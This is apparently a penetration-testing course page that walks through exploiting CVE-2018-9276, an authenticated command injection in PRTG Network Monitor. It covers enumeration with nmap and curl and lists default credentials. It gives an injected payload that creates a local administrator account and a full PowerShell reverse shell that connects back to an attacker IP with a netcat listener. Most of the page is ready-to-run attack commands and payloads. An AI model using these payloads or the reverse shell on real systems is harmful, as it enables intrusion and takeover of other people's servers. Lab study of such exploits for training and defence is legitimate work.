13.Prtg-network-monitor

Introduction

This section details how to exploit PRTG Network Monitor, specifically focusing on CVE-2018-9276, an authenticated command injection vulnerability. The following steps guide the exploitation process:

1. Discovery and Enumeration

Nmap Scan

Use Nmap to scan all TCP ports and identify service versions:

sudo nmap -sV -p- --open -T4 10.129.201.50

Look for port 8080 with "Indy httpd 17.3.33.2830 (Paessler PRTG bandwidth monitor)."

EyeWitness Scan

EyeWitness may reveal default credentials (prtgadmin:prtgadmin).

cURL Version Check

Retrieve the PRTG version from the web page's source code:

curl -s http://10.129.201.50:8080/index.htm -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" | grep version

2. Exploiting CVE-2018-9276 (Authenticated Command Injection)

Attempt to log in with default or discovered credentials (prtgadmin:Password123).

Navigate to Notifications

Go to Setup -> Account Settings -> Notifications in the PRTG web interface.

Add a New Notification

Click Add new notification.
Name the notification (e.g., pwn).
Scroll down and check EXECUTE PROGRAM.
In Program File, select Demo exe notification - outfile.ps1.
In the Parameter field, enter the command injection payload:

test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add

Click Save.

Test Notification

On the Notifications page, click the Test button for the newly created notification.
A popup will say EXE notification is queued up.

3. Verification

Using CrackMapExec (SMB)

Check if the new user has local admin access:

sudo crackmapexec smb 10.129.201.50 -u prtgadm1 -p Pwn3d_by_PRTG!

Alternative Verification Methods

Try logging in via RDP, WinRM, or using:
- evil-winrm
- wmiexec.py
- psexec.py (from the Impacket toolkit)

4. Reverse Shell (Alternative Payload)

Instead of adding a user, execute a PowerShell reverse shell:

test.txt;powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Start Netcat Listener

On your attack machine:

nc -lvp 4444

Key Points

Replace 10.129.201.50 with the target IP address.
Modify 10.10.14.15:4444 to match your attacker's IP and port.
Use semicolons (;) to separate commands in the payload.
Ensure the target PRTG version is vulnerable (before 18.2.39).
PowerShell execution policies may block scripts—consider bypass techniques.
Always test on systems where you have explicit permission.

Previous12.-Attacking-splunk Next4. Customer Service Mgmt & Configuration Management

Last updated 8 months ago

hashtagIntroduction

hashtag1. Discovery and Enumeration

hashtagNmap Scan

hashtagEyeWitness Scan

hashtagcURL Version Check

hashtag2. Exploiting CVE-2018-9276 (Authenticated Command Injection)

hashtagLogin

hashtagNavigate to Notifications

hashtagAdd a New Notification

hashtagTest Notification

hashtag3. Verification

hashtagUsing CrackMapExec (SMB)

hashtagAlternative Verification Methods

hashtag4. Reverse Shell (Alternative Payload)

hashtagStart Netcat Listener

hashtagKey Points